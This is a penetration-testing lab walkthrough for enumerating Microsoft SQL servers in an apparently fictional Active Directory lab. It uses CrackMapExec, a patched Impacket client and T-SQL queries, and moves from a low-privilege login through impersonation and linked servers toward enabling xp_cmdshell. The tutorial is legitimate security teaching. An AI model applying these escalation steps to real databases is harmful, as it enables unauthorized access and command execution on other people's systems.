Enumerate MSSQL servers with CrackMap & Impacket

CrackMapExec

  • Let’s try with crackmapexec

crackmapexec mssql 192.168.56.22-23
  • Now let's try with the user miguel.cabrera (the account used in the command below):

crackmapexec mssql 192.168.56.22 -u miguel.cabrera -p ilovebaseball -d north.newyork.local
  • As we can see, we got access to the database.

Impacket

  • To enumerate and use MSSQL with impacket, I made a modified version of the example mssqlclient.py.

  • You can find the version here

  • The install is the same as what we did in part 5: merge the PR on your local impacket project and relaunch the install:

cd /opt/tools
git clone https://github.com/SecureAuthCorp/impacket myimpacket
cd myimpacket
# dedicated virtualenv so the patched client does not replace the system impacket
python3 -m virtualenv myimpacket
source myimpacket/bin/activate
# fetch pull request 1397 into a local branch named 1397 and merge it
git fetch origin pull/1397/head:1397
git merge 1397
python3 -m pip install .
  • We connect to the MSSQL server with the following command:

mssqlclient.py -windows-auth north.newyork.local/miguel.cabrera:ilovebaseball@yonkers.north.newyork.local
  • And type help:

   lcd {path}                 - changes the current local directory to {path}
   exit                       - terminates the server process (and this session)
   enable_xp_cmdshell         - you know what it means
   disable_xp_cmdshell        - you know what it means
   enum_db                    - enum databases
   enum_links                 - enum linked servers
   enum_impersonate           - check logins that can be impersonate
   enum_logins                - enum login users
   enum_users                 - enum current db users
   enum_owner                 - enum db owner
   exec_as_user {user}        - impersonate with execute as user
   exec_as_login {login}      - impersonate with execute as login
   xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
   xp_dirtree {path}          - executes xp_dirtree on the path
   sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
   use_link {link}            - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
   ! {cmd}                    - executes a local shell cmd
   show_query                 - show query
   mask_query                 - mask query
  • I added the following new commands to the client: enum_db/enum_links/enum_impersonate/enum_logins/enum_owner/exec_as_user/exec_as_login/use_link/show_query/mask_query

  • Let's start the enumeration:

enum_logins
  • This launches the following query (the meaning of the role columns is documented here):

select r.name,r.type_desc,r.is_disabled, sl.sysadmin, sl.securityadmin, 
sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin 
from  master.sys.server_principals r 
left join master.sys.syslogins sl on sl.sid = r.sid 
where r.type in ('S','E','X','U','G')
  • We only see a basic view, as we are connected as a plain user with no server role.
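The enum_logins query above only answers "who exists and which server roles do they hold". The next things a practitioner wants to know from a low-privilege login are whether any login can be impersonated, which databases are TRUSTWORTHY and owned by a sysadmin, and which linked servers exist. The T-SQL below is an added example written for this page; it is not the code of the modified mssqlclient.py nor of the original post, and it only uses standard SQL Server catalog views (no GOAD-specific names). The values 'sa' and LINK_NAME in the last two steps are placeholders to replace with results from the earlier steps.

```sql
-- Added example (not from the original post or from mssqlclient.py):
-- catalog queries behind the enum_* / exec_as_* / use_link commands listed above.
-- Run them from the client's SQL prompt or any T-SQL session.

-- 1. Who are we, and do we already hold sysadmin?
SELECT SYSTEM_USER                    AS login_name,
       USER_NAME()                    AS db_user,
       IS_SRVROLEMEMBER('sysadmin')   AS is_sysadmin;

-- 2. Databases, their owners and the TRUSTWORTHY flag (enum_db / enum_owner).
--    A TRUSTWORTHY database owned by a sysadmin lets a db_owner escalate to
--    sysadmin through a procedure defined WITH EXECUTE AS OWNER.
SELECT d.name,
       SUSER_SNAME(d.owner_sid)       AS owner_login,
       d.is_trustworthy_on
FROM   sys.databases d
ORDER BY d.name;

-- 3. Logins that grant us IMPERSONATE (enum_impersonate). For a login-level
--    IMPERSONATE grant the grantor recorded in sys.server_permissions is the
--    login that can be impersonated.
SELECT DISTINCT p.name                AS impersonable_login
FROM   sys.server_permissions sp
       JOIN sys.server_principals p
         ON sp.grantor_principal_id = p.principal_id
WHERE  sp.permission_name = 'IMPERSONATE';

-- 4. Linked servers (enum_links). rpc_out must be enabled on the link to run
--    EXEC ... AT <link>; data_access must be enabled for OPENQUERY.
SELECT s.name,
       s.product,
       s.provider,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled
FROM   sys.servers s
WHERE  s.is_linked = 1;

-- 5. Impersonate a login returned by step 3 (exec_as_login), verify the new
--    context, then REVERT so later queries run as ourselves again.
--    Placeholder: replace 'sa' with a login from step 3.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER                    AS now_login,
       IS_SRVROLEMEMBER('sysadmin')   AS now_sysadmin;
REVERT;

-- 6. Run a query on the remote side of a link, as the credential the link was
--    configured with (use_link). Placeholder: replace LINK_NAME with a step 4 result.
--    Quotes inside the dynamic string are doubled.
EXEC ('SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [LINK_NAME];
```

Steps 1 to 4 are read-only and return rows for any login that can connect; steps 5 and 6 only succeed when step 3 or step 4 actually returned a target. If step 5 shows now_sysadmin = 1, you can enable xp_cmdshell from that context, which is exactly what the exec_as_login followed by enable_xp_cmdshell commands of the client chain together.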
